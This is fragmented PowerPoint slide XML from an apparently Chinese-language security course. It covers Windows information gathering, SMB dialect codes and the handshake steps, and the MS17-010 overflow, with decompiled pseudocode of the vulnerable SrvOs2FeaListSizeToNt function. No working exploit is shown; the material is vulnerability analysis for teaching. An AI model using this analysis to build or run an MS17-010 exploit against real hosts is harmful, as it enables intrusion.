          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>信息收集涉及多个方面，在下面分别介绍。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{794B3844-8E2F-4F7C-8D6E-9C707B245CAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911425" y="2096642"/>
            <a:ext cx="9688029" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>操作系统的名称和版本信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB6EFF11-F616-4B38-B43F-CB1E49177D9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488543" y="2724540"/>
            <a:ext cx="8156295" cy="875756"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53C464F1-6C89-4CF2-A139-EEB2982E50F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911425" y="3944130"/>
            <a:ext cx="4493538" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>主机名称和所有变量环境</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E7BC438-44F8-46EA-A48D-CDBFBD308CC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488543" y="4603576"/>
            <a:ext cx="7871040" cy="686065"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAA1EC4C-8A88-42EE-8956-FE47ED87EDC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1451284" y="5553965"/>
            <a:ext cx="7916250" cy="875756"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135138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0" y="3011502"/>
            <a:ext cx="3490056" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0x0202 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB 2.002</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0x0210 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB 2.10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0x0300 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB 3.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0x0302 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB 3.02</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0x0311 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB 3.11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>　</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D70B2155-2134-4B93-94EA-40A72DB44B97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3166821" y="2016175"/>
            <a:ext cx="9025179" cy="4841825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>协商过程：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>	首先客户端发送一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB negotiate protocol request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>请求数据报，并列出它所支持的所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>协议版本</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40868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830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>	通过下图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>包可以看到，希望服务端使用的版本是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB 2.10</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F515CCA-818B-43F3-9DD9-E4D8E43DCE10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2267745" y="1533839"/>
            <a:ext cx="9924256" cy="5324161"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="123012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1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>	协议确定后，客户端进程向服务器发起一个用户或共享的认证，这个过程是通过发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>session setup request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>请求数据报实现的。客户端发送一对用户名和密码或一个简单密码到服务器。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08210DBA-539F-4551-8D64-DB1FDAB336BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2939143" y="1894030"/>
            <a:ext cx="9252857" cy="4963970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1767360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830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>	然后服务器通过发送一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Session setup response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>应答数据报来允许或拒绝本次连接。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58E67618-EDB3-4190-A108-E39CAFFD934D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2267744" y="1533839"/>
            <a:ext cx="9924256" cy="5324161"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4396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1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>	当客户端和服务器完成了磋商和认证之后，它会发送一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Tree connect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>rerquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>数据报并列出它想访问网络资源的名称　</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9454B4A4-AB87-41A5-B59E-4D5A96EA0EB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2593910" y="1708820"/>
            <a:ext cx="9598090" cy="5149180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4166218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830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>	之后服务器会发送一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>tree connect response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>应答数据报以表示此次连接是否被接受或拒绝</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6806544-FADD-413B-B906-E627A7AD7E6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2110880" y="1449684"/>
            <a:ext cx="10081120" cy="5408316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3343432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SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C5D7D4E-5E3A-46BB-BDB1-8163A6888091}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2441509" y="599108"/>
            <a:ext cx="8493967" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>	之后服务器会发送一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>tree connect response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>应答数据报以表示此次连接是否被接受或拒绝</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6806544-FADD-413B-B906-E627A7AD7E6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2110880" y="1449684"/>
            <a:ext cx="10081120" cy="5408316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{947146FF-DB96-47B7-8E05-8F4A57F21B64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6688492" y="5797227"/>
            <a:ext cx="4493538" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>	之后就可以进行读写操作</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="363967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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C5D7D4E-5E3A-46BB-BDB1-8163A6888091}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2677068" y="72452"/>
            <a:ext cx="2949291" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MS17-010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>漏洞出现在的原因是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SrvOs2FeaListSizeToNt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在计算需要分配的内存长度时存在问题，以至于可以溢出到邻近的内存块。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"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4152498986"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5895862" y="87310"/>
          <a:ext cx="6152799" cy="6683380"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6152799">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4143037793"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="6558214">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>int __</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>stdcall</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> SrvOs2FeaListSizeToNt(_DWORD *a1)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_WORD *v1; // eax@1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unsigned int v2; // edi@1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unsigned int v3; // esi@1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int v4; // ebx@3</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int v6; // [</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>sp+Ch</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>] [bp-4h]@1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v1 = a1;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v6 = 0;</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v2 = (unsigned int)a1 + *a1;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v3 = (unsigned int)(a1 + 1);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if ( (unsigned int)(a1 + 1) &lt; v2 )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while ( v3 + 4 &lt; v2 )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v4 = *(_WORD *)(v3 + 2) + *(_BYTE *)(v3 + 1);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if ( v4 + v3 + 4 + 1 &gt; v2 )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break;</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if ( </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>RtlSizeTAdd</a:t>
                      </a:r>
                      <a:r>
